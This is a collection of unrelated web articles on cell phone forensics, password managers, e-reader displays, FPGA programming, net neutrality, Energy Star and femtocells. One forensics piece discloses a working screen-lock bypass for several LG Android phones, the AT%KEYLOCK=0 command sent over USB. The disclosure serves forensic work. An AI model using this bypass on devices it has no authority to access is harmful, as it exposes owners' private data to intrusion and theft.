Cell phones don’t feel newfangled but in truth they are. With innovation comes swift change, sometimes so swift that it is difficult for forensic scientists to keep up.
Criminals use cell phones in a variety of crimes and it is up to the forensic scientists to uncover their transgressions.
But where do they start? What are some complications that scientists encounter?
- Innovation - Change is the number one issue for forensic scientists to overcome. Even the cell phone manufactures don’t always know how to retrieve information stored in new phones, so how can scientists retrieve the information? Staying up-to-date on new cell phones is challenging but not impossible. As fast as they are created, criminals come up with ways to abuse them. Strangely enough, this can be beneficial for forensic scientists. Using online tips can allow scientists to simply access information that would otherwise remain unreachable.
- Charge – Unlike computers, much of what is stored in a phones memory is reliant upon the battery. When the electricity goes, so does the information. Depending on what information you are looking for and how it is stored, battery or charger power is an essential thing to think about.
- SIM cards and removable media - SIM cards are the soul of a cell phone. They carry vital user information. Likewise, removable media, such as SD cards, can have lots of stored data on them. It is important that forensic scientists have the appropriate equipment to read and evaluate the data.
- Passwords – Password protection on cell phones is challenging to overcome, though not impossible. Depending on the model, passwords can be circumvented in several ways.
- Internet connection – The smarter cell phones become, the harder they are to examine. Using an internet connection instead of SMS or voice makes a forensic scientist’s job much more difficult.
- Quarantine – One thing that is often disregarded is the need to sequester the cell phone before analyzing it. New text messages can overwrite old material, and connections to the internet can invalidate old data. It is imperative to make sure the phone is isolated.
- Security augmentations - Forensic scientists must be especially alert when dealing with cell phones that have been improved in some way. Some users have the capability of putting in dead man’s switches, effectually wiping the contents after an action or a period of time. Malware can also be downloaded onto the phone, placing the computer systems in danger.
There are many more problems for forensic scientists to watch out for, but these are the seven most common. Tracing cell phone data is a laborious task, but it can be done. All it takes is a little investigation, a few tools, and a lot of persistence.
This is a guest post by Coleen Torres, blogger at Phone Internet. She writes about saving money on home phone, digital TV and high-speed Internet by comparing prices from providers in your area for standalone service or phone TV Internet bundles.
Talkback and comments are most welcome...
Cross-posted from Short Infosec | <urn:uuid:0a28721c-175e-4a53-920e-8b34ba377b2f> | CC-MAIN-2017-09 | http://www.infosecisland.com/blogview/20180-Seven-Problems-with-Cell-Phone-Forensics.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00271-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93011 | 629 | 3.25 | 3 |
by Oleg Davydov, CTO, Oxygen Forensics
Modern smartphones are much more than just a device for voice calls. Now they contain a lot of personal data – contact list, communication history, photos, videos, Geo tags etc. Most smartphones can also work as a modem.
Almost every modem is Hayes-compatible which means it supports commands of the AT language developed in 1977 by Hayes. Every model supports some basic set of commands which is defined by the manufacturer. Sometimes this set can be extended and can contain very interesting commands.
Let us study behavior of an LG smartphone. When you connect it to the computer by USB you get access to the modem automatically (pic. 1). What is peculiar for LG is that the modem is available even if the phone’s screen is locked.
Thanks to that, we can learn some useful information about the phone using AT commands even if the phone is protected by a password. (pic. 2).
To learn what commands are supported by this model we have to examine its firmware. For example, for Android smartphones we only need to research the file /system/bin/atd. The pictures 3-5 demonstrate some AT commands for LG G3 D855 found in this file.
It is clear that the phone supports most of the basic AT+ command set which can be used to extract common information about it (pic. 5). But of the most interest are LG proprietary commands (commands of AT% type). These commands (like AT%IMEIx, AT%SIMID, AT%SIMIMSI, AT%MEID, AT%HWVER, AT%OSCER, AT%GWLANSSID) return basic information about the phone. Among them is hiding a real pearl – the command AT%KEYLOCK (pic. 4). As you might guess this command allows you to manage screen lock state. In order to study this command behavior we can run a debugger and use the cross-link to find its handling function code. You can see this in pic. 6.
When the command AT%KEYLOCK is called, the corresponding function, depending on the argument count, calls either lge_set_keylock() or lge_get_keylock() function from the /system/lib/libatd_common.so library. Pic. 7 shows the code of function lge_set_keylock().
As you can see from pic. 8, if you pass to the function lge_set_keylock() the value “0” = 0x30, it will eventually call the function which would remove the screen lock whatever method had been used to lock it (you can use PIN, password, pattern or fingerprint to do that). Then it will return the string “KEYLOCK OFF” (pic. 8).
It becomes obvious that the command AT%KEYLOCK=0 allows you to remove the screen lock without any additional manipulations.
It’s worth mentioning that this command only removes the screen lock without affecting user settings. The command works as described: it writes zero value (which means unlock) to the special RAM area which stores the value responsible for screen lock. This means the command does not modify ROM in any way. This behavior is forensically sound because no user data is touched and after reboot the smartphone will return to the locked state. The command does not allow the investigator to find the screen lock PIN / pattern / password; it just removes it for some time.
To perform this analysis we used an LG G3 D855 model (with V20g-SEA-XX firmware). However, the aforementioned AT commands have been proven to work on other LG smartphones as well (LG G4 H812, LG G5 H860, LG V10 H960 etc). All these models support this approach.
Therefore it’s more than easy to unlock the phone. All you need to have is an LG Android smartphone turned on and connected to a PC by USB. This backdoor is obviously left by LG for its service software but can be used for forensic purposes as well. But bear in mind that criminals can also use this approach.
Oxygen Forensics was founded in 2000 as a PC-to-Mobile Communication software company. This experience has allowed our team of mobile device experts to become unmatched in understanding mobile device communication protocols. With this knowledge, we have built innovative techniques into our Oxygen Forensic® Detective allowing our users to access much more critical information than competing forensic analysis tools. We offer the most advanced forensic data examination tools for mobile devices and cloud services. Our company delivers the universal forensic solution covering the widest range of mobile devices running iOS, Android, Windows Phone, BlackBerry and many others. Oxygen Forensic® products have been successfully used in more than 100 countries across the globe. More info at www.oxygen-forensic.com | <urn:uuid:9553f4f2-e531-4497-9766-b40c6b152a71> | CC-MAIN-2017-09 | https://articles.forensicfocus.com/2017/02/03/unlocking-the-screen-of-an-lg-android-smartphone-with-at-modem-commands/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00271-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.916174 | 1,003 | 2.984375 | 3 |
Everyone is aware that selecting passwords wisely and safeguarding them should be an important priority, yet most people need to remember so many passwords that it’s nearly impossible to do so. Because of the need to recall dozens of passwords and keep up with their rotation many people are forced to use insecure shortcuts such as storing passwords in an unencrypted file or overusing the same password on many systems. PasswordSafe is one solution to the problem.
PasswordSafe is intended to be a secure solution for maintaining a list of passwords. It uses a secure, encrypted database to store each password and can only be accessed by providing the master password. Originally developed by Bruce Schneier’s Counterpane Labs it is now developed and administered by Jim Russell and Rony Shapiro as a SourceForge project. PasswordSafe can be downloaded here.
How is PasswordSafe more secure than storing passwords in a text file or database? All passwords within the database (called a safe) are encrypted using the Blowfish algorithm, also developed by Bruce Schneier, which has so far proven to be unbreakable. Provided a secure master password, referred to as the combination, has been chosen for the safe, no one should be able to decrypt the passwords stored within the safe, even if they obtain a copy of the file. For this reason, it is imperative to choose a strong master password. For guidance in selecting the master password, refer to Eric Wolfram’s “How to Pick a Safe Password“. Take caution to never lose or forget the combination (master password) for any safe. PasswordSafe intentionally has no way to recover a lost combination, because doing so would compromise its security.
Getting started with PasswordSafe
First, download and install the latest version of PasswordSafe which is available for all Windows platforms, including WinCE. For Linux users, there is a forked version (from the old 1.x series) called MyPasswordSafe available here, but its use is beyond the scope of this article.
The first time PasswordSafe is started, the following dialog appears:
Select “Create new database” and a prompt for the master password appears.
Weak passwords are discouraged with the following prompt.
If this prompt appears, a different master password should be created.
The newly created safe looks like this:
To create a new entry choose “Add Entry” from the Edit menu.
The password above has been created using the Random Password generator button on the right.
A prompt will appear asking if the default username should be the one supplied for the first entry.
Once the entry has been created it will show up in the safe.
Now would be a good time to save the database, by choosing .Save As. from the File menu. Once, the file has been saved, the title bar will show the filename instead of “
Using PasswordSafe is just as easy as it was to enter the sample password. To use the entry, right-click on it and choose “Copy Username to Clipboard”.
After pasting the username into website, you can double-click on the entry to speed-copy the password to the windows clipboard. Paste the password into the website and login as usual.
After a period of inactivity PasswordSafe will require the re-entry of the safe.s combination.
As more and more passwords are added to password safe, it becomes desirable to switch to “Nested Tree View” from the View menu. This changes the default display to the following:
Entries are developed into trees corresponding to the entry’s “group” field.
Changing Passwords with PasswordSafe
To change the password for a given entry, right-click on the entry and choose “Edit/View Entry”. The entry will then become available.
Click on “Show Password” and then “Generate” to generate a new password.
Once the password has been changed within password safe, don.t forget to update the password for the actual website or system with the new password!
There are a few other more advanced features of PasswordSafe that haven’t been covered here, but are adequately discussed in PasswordSafe’s help file. This introduction to PasswordSafe covers the basics enough to get started using it for password management. Here’s to never again forgetting a password! | <urn:uuid:a704e19d-2907-412b-8ff5-5a1e9a5d6e46> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2005/01/10/password-management-with-passwordsafe/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00447-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.930017 | 902 | 2.734375 | 3 |
Researchers have found a way to make colors more vivid on an e-reader screen, which could lead to the creation of advanced displays and spawn the development of color e-books.
The researchers at the University of Michigan at Ann Arbor were able to trap narrow beams of light at different lengths, which ultimately reflects as color on a device. The colors remained in place from different viewing angles, and the technology could be applied to e-readers in the future, the researchers said in a statement.
That could lead to a new generation of color e-readers in which sunlight could be used as an ambient light source to display color images, much like existing e-ink displays, the researchers said. The technology could also eliminate the need for backlighting typically found in LCD displays. That could improve battery life of a device, as an LCD is considered the most power-hungry component in an e-reader or tablet.
The researchers were able to display only static images in a demonstration, but are working toward the display of moving color images in the future. The researchers were not immediately available for comment on when the technology would become commercially viable.
The top e-readers from Amazon and Barnes & Noble today have e-ink screens with grayscale displays, and tablets largely have LCD screens. Technology for e-ink color displays is available in only a handful of products like the Ectaco JetBook Color, but the refresh rates and resolution still don't match LCD screens. Qualcomm in 2011 introduced Mirasol color display technology, which made it to the Kyobo e-reader. However, Kyobo has been discontinued and Mirasol has failed to find adopters.
Researchers drew inspiration from a peacock tail, which shows different colors when reflecting specific wavelengths of light at specific angles. Mimicking the peacock concept, the researchers applied specific measurements to create slits that would reflect colors. A 40-nanometer-wide slit reflected cyan, a 60-nm slit reflected magenta, and a 90-nm slit reflected yellow. The light was trapped inside nanoscale metallic grooves and then redirected through the slits placed in different angles.
The researchers created a device to show the trapped light funneled through the slits. The grooves were fabricated and etched in a glass plate with a layer of silver. When light hit the surface, an electric field pulled in specific wavelengths of light and then funneled through the slits.
The research could lead to new reflective display screens that could show consistent colors from different viewing angles, the researchers said.
The research was published in Nature magazine on Feb. 1. | <urn:uuid:91e6f911-bf84-4a9d-8cd0-3ab21a025219> | CC-MAIN-2017-09 | http://www.cio.com/article/2388563/hardware/researchers-mimic-peacock-to-bring-vivid-color-to-e-readers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00323-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946819 | 534 | 2.96875 | 3 |
At SC09 this week, Mitrionics announced it has started to work on an experimental compiler that aims to make parallel programming architecture-agnostic. The goal of the work is to extend the Mitrion-C platform for FPGAs to multicore CPUs, cluster architectures, and eventually even GPGPUs. We asked Stefan Möhl, Mitrionics’ chief science officer and co-founder, to explain what’s behind the new technology and what prompted the decision to add support for other parallel architectures.
HPCwire: Can you tell us about the new programming capabilities of the Mitrionics platform that you announced here at the Supercomputing Conference?
Stefan Möhl: Well, we haven’t added new programming capabilities to the Mitrionics’ Accelerated Computing Platform yet. We are still in the proof-of-concept stage with this new compiler, but things look very promising. For this proof-of-concept compiler, the news is that existing Mitrion-C code, originally written for the MVP on FPGAs, will now also run on multicores and clusters. This initial proof-of-concept was made only to prove that the basic principles work, so there are limits to what code we can currently run. A production version of a portable programming language will require changes to Mitrion-C to make it less focused on what is needed for FPGA acceleration.
HPCwire: How does it work?
Möhl: The main challenge when porting between parallel architectures is that the level of granularity of the parallelism differs. For example, to parallelize code for vector processors, you would have to parallelize inner-most loops. To parallelize code for clusters, you would have to parallelize the outer-most loops. Doing general automatic parallelization (parallelization without re-writing the code) has not been solved, even after decades of research. Nor is there a general automatic way to transform one kind of parallelism into another.
Mitrion-C was originally developed as a programming language for the Mitrion Virtual Processor (MVP). The MVP is a hardware design for a compute engine specifically developed for high-performance execution in FPGAs. As such, it is full MIMD ((Multiple Instruction stream, Multiple Data stream) at the individual instruction level, so it potentially executes every single instruction of the program in parallel. This can be thought of as a limit-case for parallelism. Mitrion-C is a C-family language that supports and aids the programmer in specifying the kind of parallelism that the MVP requires. It is roughly as similar to ANSI-C as Java or C# are, so it isn’t too unusual to use.
The trick that makes Mitrion-C work for parallel portability comes from an important asymmetry in parallelization. Though automatic parallelization without code re-writes is very hard to achieve, general automatic sequentialization is much, much easier. Trivially, operating systems have run multiple programs in parallel on sequential processors for many years. For efficient execution, there are of course many optimization considerations, but it is still much easier than automatic parallelization. This property is what we use to port Mitrion-C between platforms. Since the code is fully parallel from the start, we never parallelize at all, we only sequentialize. So for a cluster, instead of parallelizing outer-most loops, we sequentialize everything except the outer-most loops. And for a vector processor, we sequentialize everything except for the inner-most loops.
HPCwire: So if you don’t have the parallelization problem, how can you handle the various memory architectures of multicore CPUs, GPGPUs and clusters, and so on?
Möhl: Our FPGA background has required us to consider these issues carefully from the start. FPGAs are usually connected to the system on data buses designed for devices with an order of magnitude less performance than FPGAs. So Mitrion-C was designed from the start to allow programmers to manage both memory latency and raw memory bandwidth in an effective manner. This issue will become increasingly important also for multicores and manycores, since increasing core counts without increasing clock-frequencies of data buses will put them in the same situation FPGAs have always been in.
Another important aspect comes from the diversity of FPGA cards. There are almost no two FPGA cards with the same memory sub-system, so we had to design Mitrion-C to have a memory model that addresses this from the start.
In Mitrion-C, there is no assumption of a single monolithic memory space. Instead, each collection may have its own address space, and different ones for different memory size and bandwidth requirements. This allows programmers to manually stage data from few, large and slow memories to many, small and fast memories in any number of levels. There are also several different built-in types for multi-dimensional data collections that let programmers specify what kind of access patterns a collection should permit. This helps the programmer in making correct and efficient programs, and also lets the compiler know what types of memory to place the data collection in. Of course, you can still write a program that requires more, larger or faster memories than a particular system has, but Mitrion-C will at least make you aware of what you demand of the system.
HPCwire: Can the exact same Mitrion-C source code be compiled to any of target architectures?
Möhl: Yes. You will need to parameterize for the number of cores you want to run on in a cluster or multicore, or how much unroll you want for loops in an FPGA, but other than that, the same code works without changes. However, not all algorithms will be efficient on all architectures, so the programmer will in some cases need to consider what platform to run the algorithms in, or change the algorithms to suit the available platform.
HPCwire: Mitrionics has focused on FPGA software development since its inception in 2001. What prompted the decision to target other architectures?
Möhl: Well, we are actually still focused on FPGAs. What prompted this is a customer interest in running Mitrion-C on standard processors and not only the Mitrion Virtual Processor. Customers want to be able to write an algorithm once and make efficient use of it on systems with and without FPGAs. They would also like to avoid having their code “locked in” to FPGAs. So we set up an experiment at Mitrionics to see what can be done with Mitrion-C on other platforms. And, as it turns out, very much can be done!
HPCwire: There are already a number of programming environments and languages that target multicore CPUs and GPGPUs and clusters. What does Mitrionics brings to the table?
Möhl: Three main things. First, Mitrion-C is a single, coherent language that maintains the same style of programming regardless of what platform you run it on. Programming languages like MPI, OpenMP, OpenCL and CUDA are really several different languages mixed together. There is the base-line C-code which is purely sequential, then there are added parts for clusters (in the case of MPI), multicores (in the case of OpenMP), or GPUs (in the case of OpenCL and CUDA). Often, you even have to combine them, such as with MPI+OpenMP. The additions introduce completely different ways of doing things than what the sequential C code does. They are not just added syntax in the sequential C paradigm. That means that you are really writing in several different languages at the same time, and need to learn them all to be able to do it properly. It also complicates the code dramatically.
Second, the fact that you have separate syntax for each architecture means that you need to re-write your code to move it between architectures. With our solution, software developers can make a single investment in writing code, and then use it on any architecture depending on what is optimal under current circumstances. With a universal programming language that can be used to target any architecture without changing syntax, it also becomes possible to explore the benefits and possibilities of different architectures much faster, in the end resulting in more efficient code.
Finally, and perhaps most tantalizing, is that the portability is not limited to the architectures that are popular today. History has seen a wide range of architectures — from the old scalar processors, vector processors, Thinking Machines, MasPar and SIMD, the Multi-Threaded Architecture, large shared memory machines, MPPs, and clusters to today’s FPGAs, GPUs, Cell, multicores and several others. Each new generation has required code re-writes. Though this is not yet proven, there is good hope that Mitrion-C would be efficient without re-writes on most of the historical popular parallel architectures. If that is the case, it bodes well for parallel architectures of the future too. Though we probably won’t be able to say “Never again!” to re-writes for all eternity, Mitrion-C holds the promise of dramatically reduce the number of re-writes we will need to do in the future. | <urn:uuid:1e2a01fd-6794-48cc-b6cd-205e447d0482> | CC-MAIN-2017-09 | https://www.hpcwire.com/2009/11/18/mitrionics_looks_beyond_fpgas/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00323-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943607 | 1,953 | 2.546875 | 3 |
The MIT SENSEable City Lab's Real Time Rome project aggregates data from cell phones to better understand urban dynamics in real time. By collecting location data from cell phone users, and speed and location data from bus and taxi fleets, the project aims to help Roman commuters make better decisions about their environment. "Imagine being able to avoid traffic congestion or knowing where people are congregating on a Saturday afternoon," said project director Carlo Ratti, director of the SENSEable City Lab. "In a worst-case scenario, such real-time systems could also make it easier to evacuate a city in case of emergency."
For more information on Real Time Rome, visit the Web site. -MIT | <urn:uuid:ac2cc628-64d9-4e33-8f52-e08338076438> | CC-MAIN-2017-09 | http://www.govtech.com/e-government/MIT-Project-Aggregates-Cell-Phone-Data.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00267-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.926498 | 140 | 2.921875 | 3 |
Regardless of where you stand on the net neutrality debate, one thing doesn’t help: misleading or confusing statements. Unfortunately there are plenty of them.
Net neutrality is an Internet ideal that will become possible If the Federal Communications Commission decides to reclassify Internet service providers from information services to telecommunications services. If the FCC reclassifies ISPs, it will be able to regulate them—and that could affect a push by ISPs to provide faster Internet service to Web companies willing to pay for the privilege.
Data-hungry Web companies like Netflix want the speed, and the ISPs want the money. Others, however, fear a pay-to-play scheme could put cash-strapped startup sites at a disadvantage.
Add the pro- and anti-regulation forces to this mix, and the rhetoric's flying in all directions on social media as well as in the news. We’ve teased out the facts behind five net neutrality myths. It won’t resolve the debate, but it’ll help you understand what’s really going on.
Myth #1: Net neutrality is ‘Obamacare for the Internet’
Republican Sen. Ted Cruz’s recent tweet making this comparison is more convenient than accurate. Obamacare is about access (to health care), while net neutrality is about quality (think speed) of access to the Internet. More to the point, it's about how to manage just the ISPs, not the Internet as a whole—no matter what conservatives say.
Myth #2: An 'open' and 'neutral' Internet are the same thing
Listen carefully to the use of "open" or "neutral" in this debate. The Internet has always been “open,” because anyone can use it for any application. The ISPs are the Internet gatekeepers facing possible regulation, and that's about remaining "neutral."
The term “network neutrality” was coined by Columbia law professor Tim Wu in 2003. The basic concept was that all Internet traffic should be allowed to flow freely regardless of what it is or where it comes from.
The Internet was a simpler place a decade ago, however. Now, in an age when consumers surf the web, Skype and watch Netflix simultaneously, ISPs face a demand for more bandwidth—and naturally, they want to be paid for providing it. Net neutrality proponents say a pay-to-play fast lane won't be neutral, and may be considered less open, because it will hamper companies that can't afford faster service.
Myth #3: Regulating ISPs is good (or bad) for users
Net neutrality advocates think regulating ISPs will level the playing field for Web entrepreneurs. On the other hand, ISPs and other critics are concerned that regulating the market would discourage future investments in Internet infrastructure.
AT&T CEO Randall Stephenson said recently that his company will “pause” investments in fiber networks until the net neutrality debate is over. In a less dramatic announcement, Comcast CEO Brian Roberts said his company agrees with Obama in principle but that “the unfortunate reality is the uncertainty it creates, investment uncertainty.”
There's no myth here. We simply don't know what ISPs will end up doing if they face regulation.
Myth #4: Without net neutrality, some Internet users will experience slower service
This isn't a myth either, but two different positions around the same fact. This is the fact: If ISPs offer faster service for some Web companies, the service for other companies will be slower by comparison.
The argument centers around a perception: Is slower bad, or just not as good as faster? Net neutrality advocates warn that if ISPs give some websites a fast lane for an extra fee, that's essentially downgrading service for all other websites. Opponents contend that service to all wouldn’t be downgraded, but those who paid extra would get better (faster) service.
Myth #5: President Obama has the final word on net neutrality
While the President’s opinion might hold more weight than yours or mine, it’s not binding. Since President Obama issued his statement supporting reclassification, the White House has reiterated that the ultimate decision will be in the hands of the independent FCC.
That means FCC Chairman Tom Wheeler is under a lot of pressure. His only official statement reflects that the commission is trying its best to end the years-long quest for net neutrality rules: “We must take the time to get the job done correctly, once and for all, in order to successfully protect consumers and innovators online.” A decision is expected in the near future.
This story, "Net Neutrality: Five Myths, and the Real Facts" was originally published by PCWorld. | <urn:uuid:06ee1600-be4f-467e-b735-4e8b317a02d7> | CC-MAIN-2017-09 | http://www.cio.com/article/2853420/internet/net-neutrality-five-myths-and-the-real-facts.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00143-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948283 | 966 | 2.734375 | 3 |
Reducing power usage and cutting carbon emissions is probably the right thing to do for the future of the planet. But keep this is mind: Green is a powerful marketing term right now and cost-savings promises are part of the marketing pitch. Like all marketing promises, results vary. One example: The amount of money a typical consumer can save by using or powering down energy-efficient computers, printers and the like is often small—in the case of an up-to-date laptop, the energy savings add up to perhaps just $10 a year.
I'm no denier of climate change, but technology users should always be skeptical. Just because a cause seems worthy, accepting conventional wisdom at face value isn't smart. Energy conservation is no exception.
The purely economic benefits of power-saving lighting, heating and air conditioning systems dwarf the savings to be had by buying an "Energy Star PC," or simply turning off your electronic gear when not in use. Unless electricity gets much more expensive than it is—on average, most customers pay about 10 cents a kilowatt hour—those economics won't change.
Even more disillusioning was the recent news that the vaunted Energy Star certification program run jointly by the Department of Energy and the Environmental Protection Agency is deeply flawed. Unlike many government programs, Energy Star resonates in the minds of consumers, and there's no end of advertising and commentary that tells us to look for the familiar blue logo.
[ For more on Green IT, see CIO.com's Green IT Hype vs. The Real Deal and our case study, How Raytheon's IT Department Helps Meet Green Goals. ]
So when you learn that government auditors were able to win Energy Star certification by filing bogus applications for non-existent products made by non-existent companies, who wouldn't feel cynical?
Sleeping Computers and Saving Money
When a laptop or desktop computer is asleep, your work is in active memory, but the hard drives have stopped spinning, the display is dark and the microprocessor is idle. As a result, power use drops sharply.
A fully awake desktop system made in the last year or two uses some 60 watts of power, but consumes just three watts when asleep. Laptops use less power to begin with, perhaps 20 watts, and that drops to about 2 watts when the laptop is asleep, according to Bruce Nordman, a researcher at the Lawrence Berkeley National Laboratory.
Well, that sounds like it should save plenty of cash. But let's do the math.
To calculate energy use, multiply the watts by the hours used; divide the result by 1000 to calculate kilowatt hours and multiply that by 10 cents for the average cost of electricity. Do the same calculation for the sleep mode, but remember, your machine won't be asleep 24 hours a day. Instead, let's say that you'll let it sleep 16 hours a day. The result: annual savings of about $10. That's right, annual. The savings on a power-hungry desktop are greater, but still just about $33 a year.
Meanwhile, screensavers not only don't save energy, they waste it. That's because those pretty designs and animations take a good deal of processing power, which in turn requires electricity.
I'm not saying don't put your PC or Macs to sleep. You should, because there's no reason to waste energy. But understand that you'll hardly notice the difference on your monthly power bill.
True Story of the Gas-Powered Alarm Clock
I've never been comfortable with the Energy Star system. It reminds me of a pre-school class in which everybody gets an A to be sure all of the kids have plenty of self esteem. Have you noticed that it seems almost impossible to find a more or less mainstream PC that doesn't have Energy Star certification?
So I wasn't altogether shocked when the Government Accountability Office issued a scathing and funny indictment of the program. Donning the mantle of investigative reporters, GAO staffers submitted applications for 20 or so fake products made by non-existent companies. Fifteen of those products passed muster with the Energy Star bureaucracy, including two that are so hilariously improbable it seems like a practical joke.
One was a heck of an invention, a gasoline-powered alarm clock, said to be the size of a small generator. "Product was approved by Energy Star without a review of the company Web site or questions of the claimed efficiencies," the GAO wrote. My other favorite: the room air cleaner. The product is depicted as "a space heater with a feather duster and fly strips attached."
This would be even funnier if taxpayers weren't paying for a program that steers well-meaning consumers to manufacturers who promise, but don't deliver, energy saving products. Or as Senator Susan Collins (R-Maine) who requested the audit put it in an interview with The New York Times: People "are ripped off twice," as consumers and as taxpayers.
The moral? Your skepticism: don't leave home without it.
San Francisco journalist Bill Snyder writes frequently about business and technology. He welcomes your comments and suggestions. Reach him at firstname.lastname@example.org.
Follow everything from CIO.com on Twitter @CIOonline. | <urn:uuid:1cb6ce31-36d2-4392-ac3f-e546f78b0aa3> | CC-MAIN-2017-09 | http://www.cio.com/article/2419072/hardware/beware-worthless-claims-in-green-clothing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00019-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9507 | 1,085 | 2.75 | 3 |
Femtocells sound vaguely like a cross between a Feynman diagram and a biology class, but they're the latest piece of gear that millions of people will soon want in their homes without having missed them before. A femtocell is a small cellular base station designed to provide superior, short-range, indoor cellular coverage in a home or office. The idea behind femtocells is simple: the hardware tries to capture the ease of setup of a Wi-Fi network while allowing seamless connectivity for existing cell phones.
Woojune Kim, the vice president of technology at Airvana, a mobile broadband and femtocell equipment maker, explained the thinking behind femtocells. "Can you take the economics of the last 10 to 20 years, where we're able to make very small wireless transmitters like Wi-Fi base stations—can you make cellular base stations small enough and at that price point so that each of us can have our personal base station?" The answer, after years of trying, is yes.
The compact base stations are a cheap way for mobile carriers to improve coverage, while remaining relatively inexpensive for consumers to get service outside a ground floor, in rural areas, or in places in which their carriers have fallen down in meeting their needs. (Yes, we're looking at you, AT&T, at least for now.)
Femtocells have been "coming next year" for at least four years, but after successful introductions in 2008 and 2009 in tests and initial rollouts, 2010 will be the first year for mass adoption. Analysts expect hundreds of thousands of units to be in place this year, with tens of millions sold each year by 2013 or 2014 worldwide.
Three US cellular operators have an in-home base station strategy in place since an AT&T announcement in March. Sprint was first in 2008, followed by Verizon in 2009, and then, nearly a year later, AT&T. (T-Mobile chose a different tack than femtocells, which it recently discontinued for new customers after four years in operation.)
The reason for the femtocell delay to market was twofold: 1) cost, and 2) the message it sent to the market. Until last year, femtocells could cost $400 to $500 at retail; improvements in technologies combined with large orders have pushed retail pricing as low as $100 to $150, with carriers reportedly paying as little as $50 per unit with extremely large commitments.
The messaging side was equally important: a femtocell told a carrier's customers that the operator couldn't give them a good signal in the home. The rise in popularity of 3G smartphones among average users, starting with the iPhone but now far beyond it, has led to people being dissatisfied with in-home coverage, whether or not they blame the carrier for it.
Rob Riordan, an executive vice president at the Midwest cellular operator and local exchange carrier Cellcom, said that the femtocell message could be interpreted as "I offer you crappy service, and why don't you buy this box from me, and pay me more money." Cellcom will shortly start offering femtocells to businesses with a different proposition behind it.
Femtocells carry the same fundamental technology used in "macrocells," the large base stations deployed on towers and rooftops, but femtos are designed to fit in a package appropriate for a home.
AT&T's notorious San Francisco and New York 3G undercoverage provoked some unsurprisingly angry responses from residents who saw the company's femtocell as a way to get customers to pay to improve AT&T's network. See this New York Times article, with the provocative title, "Bringing You a Signal You’re Already Paying For," for instance.
But not everyone feels that way. The industry believes that in the first stage, there's a huge worldwide audience for people who are in the right circumstances: living where coverage isn't expected (either by region, topology, home building materials, or other factors), or isn't available (rural or out of territory). In such cases, a carrier becomes a white knight by having a cheap way to put their network in your home, even if it's at your expense.
"Nobody actually expects their cell phone to work in the basement, or in the elevator, or in any of those other unusual circumstances," said Picochip's Gothard.
The next stage for carriers with broadband offerings or partnerships will be far cheaper femtos built into equipment that they already provide, such as set-top boxes and modems. When the femto comes built-in, you won't feel line-item sticker shock.
The Case for Femtocells
Femtocells carry the same fundamental technology used in "macrocells," the large base stations deployed on towers and rooftops, but femtos are designed to fit in a package appropriate for a home. There are also microcells, used to build smaller cells in cities, and picocells, typically installed to improve coverage in office buildings, campuses, malls, and airports.
The larger siblings to femtocells pump out lots of power and cover relatively large areas, from a building to square miles. That works well for outdoor usage, but a macrocell is wasteful overkill to get a signal into a house or office.
Simon Saunders, the chairman of the industry group The Femto Forum, said, "The users that have the most marginal coverage actually occupy the biggest part of those [macro] networks." He noted that with every user moved to a femtocell, the network regains the bandwidth equivalent of 10 outdoor users.
Because carriers have a finite amount of expensive spectrum licenses, the motivation is to have the greatest reuse of spectrum by having small cells. Small cells aren't affordable, however, so the contravening business logic is to have the largest cell size possible to cover people inside and outside with the dropped calls, low data rates, and related problems.
That's why the home problem can be intractable. In many parts of the developed world and in some developing countries, homes are made of thick building materials, like stone, or modern materials, like the plaster-covered chicken wire that's prevalent in warm, dry US climates. Stone blocks signals and chicken wire turns a house into a kind of Faraday Cage that prevents signals from entering or leaving.
Andy Gothard, director of corporate marketing at wireless chipmaker Picocell, described using a macro to push service into homes near his in Bath, England, as "trying to fill a cup by firing a fire hose through the window," the window being the only signal-permeable part of the home.
In researching residential metro-scale Wi-Fi network failures a couple of years ago, I came across Rio Rancho, New Mexico, where a provider from Michigan hadn't counted on the plaster-and-wire construction of Southwest homes. (The firm has since switched to WiMax and a different business model.)
Femtocells were, in part, an attempt to find an alternative to picocells, which were the smallest previous option. Picocells have all the requirements of a full macrocell, including special backhaul provisioning, air-conditioning, power feeds, and so on. Femtocells, in contrast, approach the wireless bandwidth problem from the bottom up, trying to provide a better experience than installing a Wi-Fi router, and only needing a few minutes to power up, establish a location lock and network communications, and be available for use. Airvana's Kim said that a femtocell can't be as perfect as a picocell, which is virtually indistinguishable from a macrocell, but that current femtocells are close enough to make no difference to most users.
Interference can be an issue between larger base stations and femtocells, with some clever work required to make sure that, for instance, someone placing a call inside a house that connects to a macrocell-—if the number isn't whitelisted, as noted below—doesn't interfere with or receive interference from another caller connected to the home base station.
